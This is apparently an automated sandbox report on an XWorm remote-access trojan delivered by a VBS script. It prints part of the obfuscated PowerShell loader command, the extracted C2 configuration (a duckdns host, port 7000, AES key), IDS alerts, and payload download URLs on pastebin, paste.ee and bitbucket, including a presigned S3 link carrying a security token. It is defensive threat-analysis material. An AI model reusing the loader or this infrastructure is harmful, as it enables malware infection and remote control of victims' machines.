F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??Tg

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:14.599789+020020204241Exploit Kit Activity Detected188.114.96.3443192.168.2.549711TCP
                2024-10-03T06:53:35.248038+020020204241Exploit Kit Activity Detected188.114.96.3443192.168.2.549728TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:10.743341+020028033053Unknown Traffic192.168.2.549708104.20.4.235443TCP
                2024-10-03T06:53:13.592811+020028033053Unknown Traffic192.168.2.549710104.20.4.235443TCP
                2024-10-03T06:53:31.500323+020028033053Unknown Traffic192.168.2.549725104.20.4.235443TCP
                2024-10-03T06:53:34.227323+020028033053Unknown Traffic192.168.2.549727104.20.4.235443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:14.450466+020028410751Malware Command and Control Activity Detected192.168.2.549711188.114.96.3443TCP
                2024-10-03T06:53:35.100353+020028410751Malware Command and Control Activity Detected192.168.2.549728188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:27.229468+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:53:32.934662+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:53:38.696524+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:53:50.480098+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:01.564440+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:02.852872+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:13.168649+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:18.695335+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:30.008241+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:31.785152+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:32.851069+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:34.704124+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:34.979628+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:42.056654+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:50.292339+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:57.753720+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:00.347039+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:01.063226+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:01.393882+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:01.708783+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:02.020012+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:02.862710+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:06.543005+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:15.805767+020028528701Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:27.281241+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:53:38.698900+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:53:50.520812+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:01.589317+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:13.171376+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:18.699279+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:30.011608+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:31.787240+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:34.705701+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:34.982207+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:42.058423+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:50.295484+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:54:57.765253+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:00.348865+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:01.065080+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:01.395979+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:01.710572+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:02.042058+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:06.545750+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                2024-10-03T06:55:15.806620+020028529231Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:32.934662+020028528741Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:02.852872+020028528741Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:54:32.851069+020028528741Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                2024-10-03T06:55:02.862710+020028528741Malware Command and Control Activity Detected46.246.14.37000192.168.2.549712TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T06:53:26.855375+020028559241Malware Command and Control Activity Detected192.168.2.54971246.246.14.37000TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: sostener.vbsAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\sostener.vbsAvira: detection malicious, Label: VBS/Dldr.Agent.VPWC
                Found malware configuration
                Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["toskaadmx.duckdns.org"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Multi AV Scanner detection for submitted file
                Source: sostener.vbsReversingLabs: Detection: 15%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpackString decryptor: toskaadmx.duckdns.org
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpackString decryptor: 7000
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpackString decryptor: <123456789>
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpackString decryptor: <Xwormmm>
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpackString decryptor: XWorm V5.6
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpackString decryptor: USB.exe
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.144.11:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.83:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, 00000C00h4_2_00007FF848E5794D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, 00000C00h14_2_00007FF848E8794D

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49712 -> 46.246.14.3:7000
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 46.246.14.3:7000 -> 192.168.2.5:49712
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49712 -> 46.246.14.3:7000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 46.246.14.3:7000 -> 192.168.2.5:49712
                Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49711 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49728 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.5:49711
                Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.5:49728
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: toskaadmx.duckdns.org
                Connects to a pastebin service (likely for C&C)
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: paste.ee
                Uses dynamic DNS services
                Source: unknownDNS query: name: toskaadmx.duckdns.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 46.246.14.3:7000
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.20.4.235:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 104.20.4.235:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 104.20.4.235:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 104.20.4.235:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: pastebin.com
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: paste.ee
                Source: global trafficDNS traffic detected: DNS query: toskaadmx.duckdns.org
                Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PASTEBIN.COM/RAW/CD7BJS7B
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                Source: powershell.exe, 0000000E.00000002.2401200406.00000272D4974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsofto
